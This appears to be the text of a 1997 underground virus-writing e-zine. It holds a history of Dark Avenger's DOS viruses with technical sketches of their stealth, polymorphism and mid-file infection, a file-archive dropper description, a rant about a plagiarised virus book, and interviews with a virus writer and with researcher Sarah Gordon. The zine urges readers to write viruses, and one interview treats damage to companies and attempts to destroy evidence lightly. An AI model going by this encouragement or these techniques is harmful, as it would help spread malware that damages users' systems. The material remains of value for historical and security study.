Bontchev != Dark Avenger [the reason in Bontchev's case is very easy to understand :)] It's also well known that the relationship of Dark Avenger to Vesselin could be described as disrespectful, or rather very negative. At least one variant of the Dark Avenger virus targets programs containing the string 'Vesselin Bontchev' and causes a system hang if such a program is run. Moreover, Dark Avenger sometimes used the expression "the weasel" when he talked about Bontchev. But we have to say that without Bontchev, Dark Avenger would not be so "popular" and well known in the whole world. In fact, Bontchev is the man who is responsible for the worldwide publicity of Dark Avenger. The legend himself claimed that Bontchev made him into Dark Avenger. Moreover, it should be Bontchev who encouraged people to create viruses through some of his articles and publications. According to Dark Avenger, some stuff written by Bontchev can be a good tutorial for those who want to code viruses and have no other information available.

But as I don't want to go off topic, here is a brief history of Dark Avenger's career as a virus writer.

Some 9 or 10 years ago, when there were not so many viruses around, one young Bulgarian boy was interested in a rather mysterious and not so well-known area of computer science - viruses. He thought of "making a program that would travel on its own ... and get to places its creator could never go". After reading articles which discussed computer viruses he decided to write such a piece of code. He started work on his first virus in September 1988. Occasionally he had access to a 4.77 MHz XT with no hard disk. As he finished the virus, he added destructive code to it, because he had no idea what else he should put in. He thought the virus would never travel outside the city. Errare humanum est - to err is human. Dark Avenger was wrong in this case. His 651-byte-long virus, which contained the string 'Eddie lives', arrived in the USA in spring 1989.

Technically, the Eddie.651 virus is a simple TSR with a hooked INT 21h, infecting both EXE and COM files on execution. An infected file is marked in the time stamp - the seconds field is set to 62 (a value a normal DOS write never produces, since the field holds seconds/2 in five bits and DOS keeps it below 30). Besides the INT 21h function EXEC, the virus also hooks the functions FIND_FIRST_FCB and FIND_NEXT_FCB. These functions are called by the DOS command DIR, and when such a call occurs the virus subtracts its own size from the reported size of any file whose seconds field is 62. As the virus doesn't check the size of such a file, if the file is smaller than 651 bytes the subtraction wraps around and DIR shows a file size in the gigabyte range. The virus contains, as said before, the string 'Eddie lives'.

Dark Avenger's next production is well known - the Dark Avenger virus family with members 1800, 2000 and 2100 bytes long. All 3 members of this family are resident COM'n'EXE infectors. The new idea in this family was the "fast infector" - files were infected not only when executed but also when opened, closed, created, or when their attributes were changed. Not so new was the payload - when some conditions were met, the virus overwrote random sectors of the hard disk. Really cruel. There were also some texts in these viruses... [of course, every virus should have some text, otherwise it gets a name like 4096 or 193257609 :)]

Dark Avenger.1800:
Eddie lives...somewhere in time
This program was written in the city of Sofia
(C) 1988-89 Dark Avenger

As described above, Dark Avenger loves Vesselin Bontchev so much that he included the following lovely text string in Dark Avenger.2000:
(C) 1989 by Vesselin Bontchev

And as the final nail, if the program to be run contains the string "Vesselin Bontchev", the virus hangs the system. In my humble opinion, Dark Avenger tried here to make Bontchev's life hell with such an overkill payload. Of course, the nice stuff with trashing sectors on the hard disk has not been removed from the viral code. As for the 2100-byte variant, it has some improvements in hiding the size increase of infected programs and so on. Sources released by the author are included in this issue of our zine.

After some time, Dark Avenger released something absolutely unknown to the world. Another first of his was the hyped MtE - the first ever poly engine. [Washburn's "exercises" I do not count, sorry ...]

Polymorphism at such a level was something new [:)]. Mr. Skulason (if I remember right, responsible for fuckprot or whatsoever) wrote in Virus Bulletin in April '92 that MtE should be "a torture test for the R&D departments of all the antivirus companies". Moreover, the editor of Virus Bulletin noticed that "Dark Avenger tech support is presumably better than that offered by certain anti-virus vendors". He he he :))))))) There were two releases of the MtE. MtE 0.91 beta was released in August 1991 and MtE 1.00 beta in April 1992. For a long time the antivirus vendors were not able to detect MtE with 100% reliability. Detection rates ranged from 0% in the case of Xtree's Allsafe v4.1, or even worse, hanging the computer in the case of CPAV and CPAVSOS v14, to full 100% detection in the case of IBM Antivirus, F-Prot, TBAV and many others.

Another Dark Avenger world first was the COMMANDER BOMBER virus. At the time of its appearance, a substantial part of AV programs didn't follow the code flow; they just scanned for signatures near the file beginning and the file end. And now imagine the surprise of those so-called virus researchers when some bloody virus came out which was not only inserted somewhere in the middle of the file, but where a couple of islands of code, bound together with calls and jmps, led to the virus body. [I would like to have seen their faces at that historical moment.] But in medias res .... COMMANDER BOMBER is an inserting COM infector. Its own body is 22596 bytes long, but the code added to a file is actually 4096 bytes long. The virus infects COM files on execution if their size is greater than 5120 bytes and less than 61183 bytes. COMMAND.??? will never be infected. The virus selects a 4 KB block in the file and appends this block to the end of the file; the viral code is placed in the resulting gap. Then the virus generates some kind of garbage code which brings execution to the main virus code; the only thing the garbage generator watches is the stack and the SP value. But unfortunately, the garbage code generation seems to be buggy (about 1 of 8 generated samples is not able to work). This may also be the reason why COMMANDER BOMBER wasn't so successful compared with other Dark Avenger viruses. This virus has another interesting feature - absolutely no signature in files. But files do not get infected over and over again. This is handled by a very simple trick: when an infected file is to be executed, the virus saves its memory image to disk and then repairs and executes it. So if the file is infected twice, the second infection rebuilds the file as it was with only one infection, and this first infection saves to disk a file infected only once. It is a very handy trick, and you can try to code something like this....
Just for your information, Jim Bates, the man who is probably responsible for the fate of the Black Baron of England (aka Christopher Pile), had the feeling that "although there are similarities of style, ... [stuff deleted] ... that code is beyond his [Dark Avenger's] limited capabilities."

In my humble opinion, COMMANDER BOMBER has two main weak points. The first is the garbage generation. Invalid opcodes are not very good in virus code; everyone should avoid them, otherwise there is ABSOLUTELY no chance of entering the "In the Wild" list. The second weak point of this virus is the lack of encryption or a poly engine. It could have been a very hard virus to defeat if Dark Avenger had combined MtE polymorphism with COMMANDER BOMBER's mid-file infection. Viruses of later years did use such a combination, and this led to the very successful One_Half virus by Vyvojar. Sources are included in this issue. But, as not everyone has the necessary abilities, *-Zine is proud to present you the disassembly of this famous virus. Enjoy it.

Download attached files here

Resources used to write this article:
brain
own archive
old issues of Virus Bulletin
Cicatrix's VDAT 1.8, which is quite good IMHO
interview with Dark Avenger by Sara Gordon
1 pizza from my favourite pizzeria
2 bottles of beer
1 pack of chips

The author is not responsible for the bugs in the article. Moreover, the author is not responsible at all. Especially 4 Sara G.: What the fuck was the joke with the anorak?

This article is (c) 1997 by the *-Zine. Any use of it in whatever form is prohibited without the explicit written permission of the *-Zine staff members. Eventual violation of this restriction will be subject to prosecution. All the legal costs of the *-Zine staff will be paid by the prosecuted.

This is just a little article to keep you informed. The big world of business is ruled by just one golden rule. This rule is very simple: big fish eat smaller ones! Only in some exceptional cases can a small fish eat a bigger one. The latest victim of this rule has a well-known name, especially in the virus underground, so I want to tell you its name. Read my lips .... TBAV, Thunderbyte Antivirus, produced by ESaSS B.V., a Netherlands-based company, is no longer independent! As stated by TBAV officials, TBAV "decided to become a part of the NORMAN Group". In plain text: Norman bought up the TBAV technology and research team. This means not only a change of the product name to Norman Thunderbyte Virus Control, but also probably new and more aggressive advertising for the product.

And this advertising makes me laugh. Just for illustration, some quotations from Norman Data Defense Systems materials.
... Norman Thunderbyte Virus Control never becomes obsolete. [but they provide updates every two months]
... Norman Thunderbyte Virus Control is always one step ahead of the virus writing community. [I think this will be the joke of the year, or am I not right? :))))]
... Norman Thunderbyte Virus Control is one of the few virus scanners able to understand the OLE2 format ... This means full detection capability for macro viruses, even encrypted ones! [Just check out the Slovak_Dictator macro virus elsewhere in this issue to get a corrected opinion :)))]
... cleaning utility which enables all users to quickly and effectively remove all macro viruses. [I want to see it, dudes :)]

Historia est magistra vitae. In the past we have had a shitload of tricks for pissing off TBAV, for deactivating its resident driver, etc ... In the past there always were (and always will be) viruses which forced AVers to change their products more or less. TBAV was no exception. And they should be one step ahead? Stop kidding! We will see...

And here is an almost complete Intel opcode table. We bring it to you as some kind of help for your attempts to code a new, kick-the-ass poly engine. Editors

Download here! Hi dudez! Here I present to the community the result of my work. Basically, these tables are based on opcodes.lst from Ralf's list. All I did was transcribe them into this form. As it took quite a long time, I hope you will use it and enjoy it. MGL

Just a marginal notice from a 1999 position - the table I prepared in 1997 unfortunately has some minor bugs. Some other ppl took over the table and didn't notice them, exactly as I didn't .... Such is life ... :)))))

Hi guys. I decided to update Quark's ARJ Dropper for RAR dropping. I think that archive infection has a future on every OS, so I want to include ZIP and LHA dropping in the next release of *-Zine. What this code does and what it doesn't:

First it checks whether today is some day of August. On this "some" day it launches my payload. Otherwise it goes on to infection. Then it finds the first ARJ for infection. If it finds one, it tries to infect it. If the archive is already infected, it looks for the next ARJ. If it doesn't find any ARJ to infect, it tries to infect RAR files. The RAR file can't be MULTIVOLUME (in the next release it can be), can't be LOCKED, and the archive can't contain AUTHENTICITY information. RAR infection is very simple. Go to EOF, write a header, write yourself, and the infection is done.

Download code and examples here

So I wish you many happy days and a connection reset only by beer and never by peer. Blesk.

My greetings to :
all co-authors of this zine  >>> see ya at next release
#v                           >>> I will be back soon
Qark                         >>> Thanks for ARJDrop in VLAD
Dalmatin101                  >>> I miss you.
Ilo                          >>> Thanx for the keys from LAB.
Pedro                        >>> You bastard, get in touch!!!!

PS: Do you know what the worst mutation of AIDS [eic] is called? I think it's Gates [geits] and W95. PS2: To view this you must have a math coprocessor.

[The stuff above is Blesk's original as we received it. The English is lousy, but Blesky is improving every day...]

If you are a puritan or do not like four-letter words, you are advised in your own interest to skip this article. It may contain examples of bad language, lewdness etc ... Editor

When I bought, in my favourite book store, a book titled "Modern computer viruses - basics, prevention, protection", I was really pleased. But this feeling didn't last more than a few hours. As I read each further page, I got a strange feeling, as if I had already read a substantial part of the book elsewhere. This Czech book, titled "Moderni pocitacove viry ....", written by Josef Jaluvka, is divided into two parts. The first part is the usual crap like what a virus is and what it does, defining types of viruses and so on. The second part, in my humble opinion the substantial one, is the crucial part of this book. It is a quite detailed guide to writing viruses. But ... I mentioned before my strange feeling about this book. And this second part brought the proof.

About 50% of this book is ripped from various zines, mostly from VLAD, 40hex and the NuKE journals, but also from serious hardcopy publications which are copyright protected. But this author, son of a bitch, gives not one fucking credit for stealing the text, schemes and sources. Asshole! Cock-sucking motherfucker! Fucking lamer! DIE!!!!!!!!! When I told some of the people whose work was stolen, they were really angry. Just one example for all ...

One former member of the vx underground, now retired, was really angry. I was asked not to publish his name and his opinion. But just to illustrate his pleasure, I put some of his opinions here anonymously. ... and I'm not surprised... these books are all shit anyway. All your tutes are included. But that dick didn't put one single credit in that book

... no shit! what a jerk

... goddamn fucker. Good thing those tutes aren't so great anyway :) In some other place in the book that "author" is really without any shame. He just ripped a series of articles originally published in the elite Slovak hardcopy magazine PC Revue. Even the schemes are the same ...

I guess, if the true author of that part of the book reads this (and I know he will, because he is an AV sucker working for some company producing an antivirus), he'll prosecute that lamer Jaluvka for copyright violation. I hope he'll request at least 1,000,000 for that violation. So, I wish you to lose that case, Mr. Jaluvka .... [To the reputable unnamed dude .... I can put you in contact with a really kick-the-ass lawyer. Just mail me at our e-mail address at hotmail.]

Just to illustrate some of the really valuable information in the book, imagine this. On page 202, chapter 5.1 "Pasivni obrana" - Passive protection, Jaluvka describes how the authors try to make things harder for AVers. One of these counter-measures should be code optimisation. And he gives some excellent examples in a table.

In book two, chapter one, Jaluvka describes some toolz necessary to fight (and write) computer viruses. He describez Techhelp! 4.0, some deep-inside-DOS books, Sourcer, AFD pro, Turbo Debugger, Quaid Analyzer and ... that's all folks :) He has no idea that Ralf Brown's Interrupt List exists (every good FTP site or BBS has it), that the Soft-Ice debugger is on the nearest warez site, and ofcos, that there is a shitload of virus zines. But, maybe, this omission is just on purpose ?

Although the book contains a couple of useless crap and some really screwing mistakes, it could be used as a quite good tute to code viruses. But I think that is not the thingy the author wanted. But people, if you are publishing some stuff, do not forget to include that funny C in brackets. Just by putting (C)opyright 1997 by your_name_here you should be protected. And of cos, in case of copyright violation you can prosecute the bastard.

This article is (C)opyright, (c)opyleft 1997 by The Ziggy Zag and was written just and only for the bombastic issue #1 of the *-zine.

An Immortal Riot/Genesis original (c) 1997 The Unforgiven. May freely be quoted!
Index of this article:
Introduction
Things to do before physics
Red Hot Chili Faces
The early Insane Reality - Insanity or Reality?
Current life & general adult hints
Satisfying one's ego
AV-Interview
IRL-Papers
The horror!
Gimme more cheese please
Eugene K
Side-effects the conversation way
Scene-Zines
Greets
Credits
Goodbye's and cya somewhere.. somehow.
Quotations & Poetry
Future


Mgl (Mengele.(P)hD?) told me SVL was about to release a newsletter, and asked me kindly to contribute a little something to it. He had nothing in mind as to what I should do for them (I said no to source-code contributions since I didn't feel like decreasing the code quality) so I just had to think about something myself. Well, this is the result, perhaps nothing really worth wasting any time with, you decide. My nature is to please anyone whenever I can so don't hold me responsible for you losing your faith in humanity, society, god or whatever. If someone wants me to write just something, surely I'll do it. If he would've asked if I could give him a blow-job, I would though have turned down the request.

This contribution from me is styled after VLAD-AF article.2_5 because I find the scene way too serious and that article a good read (Yay. I wrote it ;)). This means this can be seen as an early valentine issue from myself included in the SVL-e-zine #1. Or it might just be seen as wasted bytes dedicated to wasted souls. Notice that the rest of Immortal Riot/Genesis has nothing to do with this stuff at all. I assume personal contributions are allowed to other zines, specially since MGL contributed to IRG#8. Also important to mention is that none of this stuff (I guess) would make it into an IRG-zine due to our new technical styled magazines which I hope you all did enjoy!

So... This is from all of me, to all of you - whoever you are. My dog surely will like it, but an updated interview with him won't follow! Pardon me. Deadly serious ironic/sarcasm-ish reading and happy '97! - The Unforgiven

Things to do before physics

Before I continue writing I'd like to take the opportunity to mention a few things that perhaps could ease my burden. 1). Time to spill the beans... But who wants to eat them anyways? I'm as for the moment writing & doing research on an article about "why viruses are written, for whom they're aimed, why viruswriters keep on doing them, personal motivation for viruswriting, why you once started and what you find fascinating (or at least interesting) with them." So, I'd like *every* writer of computer-viruses to email me and write a little something about the above mentioned questions. If you feel like adding a few things that you find interesting go ahead, let your mind go wild!

You can be anonymous if you like but don't forget to mention that! This article will hopefully (most likely) be included in our next issue of Insane Reality - IRG#9. My email addresses are: Notice also that those systems are rather unstable, but if you read (II) you know I also can be reached on that address ( (II) is 9 lines below this line ). 2). Part II - Where you rather not want your daughter to be late at nights... On there are some IR & IRG files located (ir.html is the file located on that address btw, if that is of any use). It's not an official IRG page but all of IRG.SE know the homepage operator and he kindly lent us some HD space. Every Swedish IRG member can also be reached on that address - just email and he will kindly CC (that is the abbreviation for _carbon-copy_ if my memory isn't totally phucked) them to the correct person. Notice though that the official IRG-page still is located on:

3). I'm just an inspiration for birth-control... My submission (another word for contribution, Quantum told me ;)) to VLAD-AF (Vlad-April Fool's Edition) called "IR#8" contained a little challenge - namely to crack "File Encryptor". Well, Sepultura found out the 12 byte long key which was "tuir@MAR.C0m" (w/o the quote-marks).

The April fool joke from me was that secret.txt never did give out my real information nor did it contain the reasons why my handle was The Unforgiven. For those who wonder.. keep on wondering! I doubt that it has something to do with suicide though, which some brave writer believed.

Also notice that Quantum never did hack (since it doesn't exist), and ripped "IR8" from there, it was a submission to their zine from me, pretty much like this is ;). He wrote that information at the end of the article. Well as I figured you never did read the entire faked Insane Reality #8 ;) and believed him. April sucka. I hope you reach the end of this one :).

Red Hot Chili Faces

Hmm, I don't quite know where to start, but I would like to comment on a few personal things at this entry. There are a few good reasons why I didn't contribute much to IRG#8 and beside being very busy with life, university, my gf and the general irl-stuff I re-read the IR-zines and felt terribly embarrassed for them and felt like writing no more. For example, I started to write an article called "What good side effects viruswriting can result in", but gave it up. It became too personal, abstract and complex. And beside this, it turned huge. A short summary of my results might still be included here or elsewhere since it's a rather interesting topic. So stay tuned.

The early Insane Reality - Insanity or Reality?

Well, both really. They're insane, yet real. I was red-phucked-up in my face and my heart went ape while reading some articles, specially those which included stuff written about girls and politics. And yea.. those viruses too. *Sigh*.

Also worth mentioning, I wasn't too proud to see some text-strings included in my viruses or in programs included as hex-script in some zines. (One example is "" in IR#7 (reality.010 among with basically, the entire adventure of porno)). For those who've been harassed, I'm sorry.

Hrm, about some articles... Really, who's interested in reading about some Maria, some Ellinor, some Anette or some other girl? Who's really interested in reading about a confused teenager's opinions about something that he cannot express properly in English? Who really bothers about a person who rambles on and on and on (like now) without giving any information, just pure junk? A real rnd_garbage generator, or so? However, for those who really are interested in me and my life, junk stuff, etc., paradoxically enough I won't let you down, but this time write about something that I can be proud of and still will be proud of when I read it in let's say 3 years. However, it's still junk though. Do I never just give up?

Current life & general hints, advice and shit

Current life is cool. I study and spend most of my spare time with my close friends or with my gf (name won't be mentioned) who I've been together with for about half a year (so far).

Hints in life: have plenty of sex. If you consider yourself too busy or "too of something else.. " change opinions. Nothing is as relaxing as it. It's though not good to become a "sex-addict", since most addictive things are bad for you, sex being the exception as long as you have semi-control over it (having sex with yourself w/masturbating 5 times a day isn't the way to go). Not only is sex great but to really care about someone rocks. Don't let your life miss this.

If you smoke just give it up. It smells bad and it won't do any good for you. Smoking at parties is alright but it doesn't really impress most ladies. Socially smoking is great, but socially being decently drunk is also a killer, so.... it isn't perhaps the best way to deal with things'n'shit anyways.

Alcohol. CH3-CH2-OH. This rocks. Don't be sober too damn often. Home made wine can rock (and beside it's cheap, it's a good hobby...).

Astronomy. Really interesting and is a great thing to discuss, philosophize and crap on about after a few beers. Only a few things can be described as complex or as simple as this.

Driving-license. Freedom costs. But damnit, it's worth it.

Cooking. Everyone likes to eat, be sure you can do magic in the kitchen. Don't rely upon girls to do this for you. Not being dependent on other persons is essential in life. I only wish I could describe my situation as "not being.. ". Bah, isn't money the key to everything? (yes, that might as well include the r@@t of evil, too)

One Half. A really good virus, lacks bugs and contains a really cruel original payload. This issue includes the original source code.

Suede - Coming Up. A really cool album, maybe the best album any U.K band ever produced. Sgt.Pepper from Beatles might just be up there.

Ford Fairlaine. "Eih.. I fucked him!". Great fucking movie if you ask me. Up there along with Eddie Murphy's RAW.

Hotmail. Well, any anonymous mail-system is great if you feel like giving your teacher some sort of feedback (criticism can be kind of sensitive, just trust me..). Http:// A cool rerouter can be found on ( is one of those catchy phrases..).

Burger King. Just so much better than fucking McDonald's. Not a good place to work at I guess but for lunch (not date-dinner though!), it's more than OK.

AVP anti-virus. Love the demo-section. The scanning/cleaning capabilities are also really impressive. Along with its code-analyser. If only it would run a little bit faster on my machine.

Java, html and high level languages. Well, assembler is cool, but I sincerely doubt it will get you wealthy. Internet and its applications are what bring you money. Developing things fast is what companies want you to do.

Irc. If used properly (i.e. not sitting there wasting all your spare time) irc can be as good as a shrink depending on which people you have a conversation with.

Money. I have stated that greed is your worst enemy, so watch out. Money tends to change things, beware so it won't mess you up. Might just solve your problems better than booze. Booze solves things by its nature ;), problems are not included though.

Drugs. If you're afraid to face reality, change your situation, don't flee from it with drugs, computers, irc and shit like that. If you can control your use, it will sooner or later turn into abuse and you should give it up asap.

Clifton Classic clothes. A sleep-over, black jeans (or ordinary Docker's if you prefer that) combined with Sweet Georgia Brown hair pomade looks nothing but great.

Insane Reality. For whoever finds low-level assembly programming and virus-related things interesting this is the zine to get ;). Hehe, just had to mention this.

Love. If you don't find someone else to love that loves you back, be sure to love yourself. It's great to have a massive, yet humble ego.

Studies. Can be quite hard. Compared to life and work it's though not as hard as you once believed.

Isaac Asimov. Truly a smart writer. The books about the "Foundation" and "robots" are good and cleverly written. Something useful to waste your time with and might just get you interested in astronomy.

Acqua Di Gio Giorgio Armani. Going around stinking of bloody Fahrenheit or some other highly common eau de toilette or after shave always manages to upset someone. Be original and expensive in your choice of scent.

Coffee. Keeps you awake during studies, during hacking, during coding. Sleeping is such a waste of time, really.

Oxygen. Can't really do without it, however some early viruses in the world's timeline could.

Overrated things

Hitchhiker's Guide to the Galaxy. Isn't all that great, really. Has a few points, but not worth 900 pages.

Windows/95. Everyone knows this OS sucks, how come everyone is using it?

Swedish chicks. They aren't all that neat. The majority is just plain trash, most of the rest is average. A minority is something to have in the long run. Of course, one doesn't realise this on a 1-2 week long vacation.

Sleeping. Everyone likes this and it's essential, it's said. But, really, it is like wasting 1/3 of your life.

Opinions. Who will listen to you anyways? Who needs goddamn opinions? Why are you even reading mine?

Technology. Science should be fiction/not truth, dreams/not reality and so on.

Neuromancer. Another book not worthy of its reputation. William Gibson just ain't no good author.

Action movies. Do I have to comment this?

Satisfying one's ego

Here's an interview I filled out for Richard Loearker's book. It will be an anti-virus research book and I do encourage every viruswriter to erase my answers, fill in your answers yourself and send it to If you want to add more questions to it, that is fine, too. I know this is lame, egoistic to include an interview with yourself, but this ain't no popularity contest. Do me your worst. Personally, everything I've ever written is horrible; this piece (i.e. the interview) I see as the exception, but that might just change if I re-read it in a year. Well.. most things tend to change.

What is your handle?
My handle is The Unforgiven.

How did you get your handle?
I found the handle on one of Metallica's albums and decided to take it. I liked the song and the alias did somewhat fit my person. I don't know exactly why, but metal-music has in a way or two always inspired viruswriters so it seemed to be a natural handle to occupy.

How old/young are you? (Approx. if you don't want to be specific)
I'm 21 years old.

Would you dare to give me your first real name? (Do if you want to, don't if you don't want to)
Sure, that would be no problem ;-).

How would you describe yourself?
I prefer not to since your readers would probably think of me as some sort of bragger. Ah well, I think I'm a pretty ordinary young adult who is a part-time enjoyer of life. As for the moment I'm studying at Chalmers University of Technology located in Gothenburg (Sweden), and will hopefully be for quite some time. I've worked with various things during the previous year, among many things computer-security. Although I liked my job I decided to get back to school after a moment of clarity. Socially I'm really not very complicated. I live a healthy social life with really good friends and with my girlfriend who's always there for me. I believe I'm very spoiled concerning this kind of things.

How do your friends and people around you see you? (BE HONEST! ;-)
I am not a mindreader, but I do however believe that most people have little or no trouble with my humble person. Of course, there are always exceptions and honestly I don't deserve to be liked by everyone. Hopefully all that is in the past, but who knows? Cruelty is one mean habit to kick. It just won't walk away all that easy. I always try to care for persons who care for me and I'm always interested in getting to know new persons. Maybe those are the reasons why people accept me for who I am.

Since when did you get involved with virus writing and how did you become interested in the first place?
I became interested in viruswriting somewhere back in 1993. Me and a friend started Immortal Riot - mainly a viruswriting group, and I had to start to learn assembly.

Since when did you get involved in a virus authoring group?
When I started the group, of course.

What made you decide to join this group?
I didn't join Immortal Riot, I created it. I don't though know exactly why I formed yet another viruswriting group, but it seemed like great fun and I tried it out.

How did this group get its name?
I don't have a clue. It did sound cool.

What are the reasons for you writing viruses?
I'm totally clueless! There aren't many good reasons really, but viruses fascinated me and I wanted to learn more about them. The best way to learn more about viruses is to write them and so I did.

What is the main purpose of the group?
To write new good undetectable viruses, supply the masses with virus related information and knowledge for whoever it may concern. One of our goals in the beginning was to learn the shit ourselves and teach each other the knowledge achieved. Ah well, mainly the purpose of a viruswriting group is individual. I doubt we had any specific purpose really, mainly it was just a fun thing to waste your time with.

Approximately, how many viruses have you written?
I couldn't count all updates, new versions and so forth. The viruses released in the wild and which have infected computers around the globe might be around 30.

Which viruses were a real challenge for you? (Masterpiece?)
When I finally got the knowledge to write some good virus I got unmotivated and grew bored with it. Mainly I wrote viruses whenever I felt like tormenting some computer geeks or when I was really upset about something. Nowadays, I've calmed down or maybe I just got better things to do with my life? Who knows, I might give it another shot, sometime.

Have you written any virus toolkit or add-on?
No, I don't think so.

Why have you written this toolkit or add-on?
..

What kind of reactions did that program get?
..

What's your attitude towards antivirus researchers and why?
I've no problem with most of the guys "on the other side" and most of them do deserve some respect. Some of them have though some serious attitude problems with viruswriters, but honestly I couldn't care less about them. Some persons have problems with everything and this just ain't my burden.

Give me some opinions about and his product. If possible, motivate.
...

Frans Veldman (Thunderbyte Scan)
Frans Veldman is a really good low-level programmer and TBAV is a technically excellent product.
...
Dr. Alan Solomon (Dr. Solomon's Antivirus Toolkit)
I believe Dr. Solly has a huge identity crisis or just heaps of problems with his very own person. I haven't looked closely into his product, but he ain't programming on it himself so it can be good.
...
Fridrik Skulason (F-Prot)
I like Frisk a lot! His product is excellent and I recommend F-Prot for everyone who is looking for an anti-virus program. Fridrik himself is a very nice person and he's also a lot like "us" but older. He once stated in an email to me saying "viruswriters are a lot like me 15 years ago,", I like him for being honest. Also notice the comma in the quote before the quotation mark ends. Well, let's just say I'm trying to act as a reporter.
...
Eugene Kaspersky (AVP)
AVP is a good product, too. I don't know very much about Eugene but I want to believe he's nice.
...
others you would like to give your opinion about? (ME? Naaahh)
Nah, I wouldn't waste my time to write anything about John McAfee since everyone knows his product (Scan) sucks bigtime and he's a fake.

What is the best line of defence against computerviruses and how would you implement it?
To remove all floppy and harddrives and never copy anything? :-). Honestly I don't quite know. No system is 100% safe against virus attacks. Personally I like resident monitors and recommend other persons to use them if they're afraid to get a virus (I believe the TSR monitor called F-Prot Gatekeeper is a good choice). Some sort of scanning software is also good to execute once in a while..

Would you like to work for an antivirus company as researcher/troubleshooter? Why or why not?
I would have no problems with that. Would be quite ironic and I couldn't say I wouldn't like it before I had tried it out.

If someone turns to you for help when his computer has a virus, would you help him? Please motivate why or why not.
Sure I would. That would perhaps increase my knowledge about these little things and at the same time I would get the other person's respect. I've done this several times during the past years.

Would you ask money for your help?
Of course not. I dislike greed.

If it turns out to be a virus you have written, what would you do?
This too has happened :-). I gave out all technical details about the virus (trust me, they got really impressed) and wrote a cleaner for it. Voila! Respect earned in a cheap way!

Would you still ask money for your help?
I wouldn't in the first case, so... No, I wouldn't. But I would offer them the source code (claimed disasm :)) for further investigations.

What would your initial response be if you see a newspaper that describes your virus wreaking havoc in:
A government agency?
First I would laugh my underpants off, but then I would be a little bit worried about it. My handle/real identity is pretty known afterall so this could get me busted. I think I would destroy all evidence so they couldn't prove shits.
A hospital?
That depends. I wouldn't like to see someone getting hurt physically by a virus of mine but if it just had infected some of their computers or trashed some easy to recover data I'd have no worries with it. Of course this is bad publicity, but I can live with that.
A large company?
Yummie! I like all daily newspaper reports concerning companies getting hit or (preferred) wiped out by a virus of mine. I would be happy a day or two then I would forget all about it.
A small company?
I couldn't care to discriminate between large or small company. Of course I would like this too.

What would your initial response be if this company went broke due to your virus?
I would silently say "Woops, better not trust computers, geek." and get paranoid about the consequences. Surely, they would want someone hanged.

What would your initial response be if someone dies in the hospital due to your virus?
Shit! Really I wouldn't like this to happen. I'm not a weirdo. I would probably think about this a lot and after quite some time come to the conclusion that it was all an accident and not, - not even indirectly - my fault. Then I would try to forget all about it and blame the dead vegetable on someone else.

What would your initial response be if the government loses all police arrest records due to your virus?
Voila! This I would indeed like. But then again, they wouldn't report this and just restore the records from backups. If they had no backup I would think twice about the effects this kind of incident may bring and get really paranoid.

How is the law in your country concerning computer viruses and what is your opinion about it?
The law is a complete mess. I can understand if deliberate spreading of computer viruses is considered a crime in some countries, but writing? No way! And how easy is it to prove that I deliberately did spread a virus? Most laws about viruswriting have a large amount of flaws. Surely, with a good lawyer you will get away with it. Sweden hasn't for the moment any specific law which forbids this.

Have you ever been arrested for doing illegal things with computers (viruses, phreaking, hacking)?
No. I have never been arrested for anything. Aren't I too legal? :-).

Has this arrest altered your view of these activities, and, if so, please describe the stage you went through.
..

Would or do you write antivirus software?
No I wouldn't. I couldn't make money outta it anyways and just writing one for fun is a waste with my ever decreasing amount of spare time. I have though written cleaners against viruses reported in the wild. It's of no use to have a product detecting 10.000 viruses which aren't a real threat.

If so, what kind of software has your main interest?
TSR-blockers, scanners & cleaners.

What would you like to say to antivirus persons if you have the chance?
"Hello". Which is a good first word to start a conversation with.

What would you like to say to new virus writers that are getting into the scene?
It's not really worth it and maybe it's only a waste of time for everyone. In the end nothing of what you are doing now counts. Find something better to do and get on with your life without the scene. It won't do shit for you.

What are you planning to do in the future with the knowledge you have now about viruses?
Frankly said I don't quite know. I had use for the knowledge gained from the scene and from friends in the scene. However I would like to believe that you have use for anything you ever learn, so it's not really such a big deal afterall. I'm as for the moment writing an article about what good side-effects viruswriting may have (on a personal basis), but as for anything concerning the future, you just don't know.

Do you think that writing viruses was a good decision for you to take? Please motivate why Yes or No.
I wouldn't know. I couldn't possibly know what would or could have happened if I didn't. I only know my situation as for now, but sure I like my current life.

PS: This interview will be put in a Dutch antivirus book.

AV interview

Here comes an interview with Sarah Gordon (all of you surely know her). She can be reached at on Here it follows anyways, enjoy!

First of all, i would like you to give me a personal character presentation about yourself in your own words. then, secondly, (be honest), i would like you to write how you think other people around you see you.
Personally, i try just to be honest, thorough, compassionate, and loving person. i try to not make judgements or draw conclusions without thinking them through, and i try to be fair. (note: i did not say i dont make judgements or draw conclusions. i said i try to think them thru and be fair. i see nothing wrong with a person saying 'i like or dont like this or that and here is why', or 'this or that is wrong, here is why'. i am not a very good 'game player', and usually just say what i think. since sometimes what i think may change, this can be a problem :) my priorities in my personal life are relationship to God, to my husband (i was recently married as you may know), to my children (who are grown), to my friends, and then to my work. at least, in theory this is the case. how i see myself?..hmm, well, i try to adhere to what i think is important, but i do not always succeed. how others see me, well, you would have to ask them :). but i think sometimes some people have preconceived ideas, or want someone to fit a certain mold they are comfortable with, so they put me there. when they do actually take the time to know me, they often find out they were wrong. i think also this happens with many people, not just me. (it could be they find out they were right :) yet others, usually those who are professionally competent and secure, don't have these problems - they see the bigger picture and have no need to create an artificial life-model of another person :) (no pun intended). i am told that i have no sense of humour and that i see things 'differently', whether or not this is a benefit is an exercise left to the reader.

about your articles, what gives you motivation to write them?
well, i write different kinds of articles, and the motivation is different for different ones, at different times. i write about something if it interests me, and if i think i may have some idea someone else may not have thought of. or if i see something written i dont agree with. i have written several for money, but they are usually technical security articles, nothing to do with viruses or virus writers, or any of that. sometimes it is nice to deal with 'non-people' issues, there is a lot less room for 'controversy' :)

and/or the virus-community with your write-ups? (if yes, motivate what.. ).
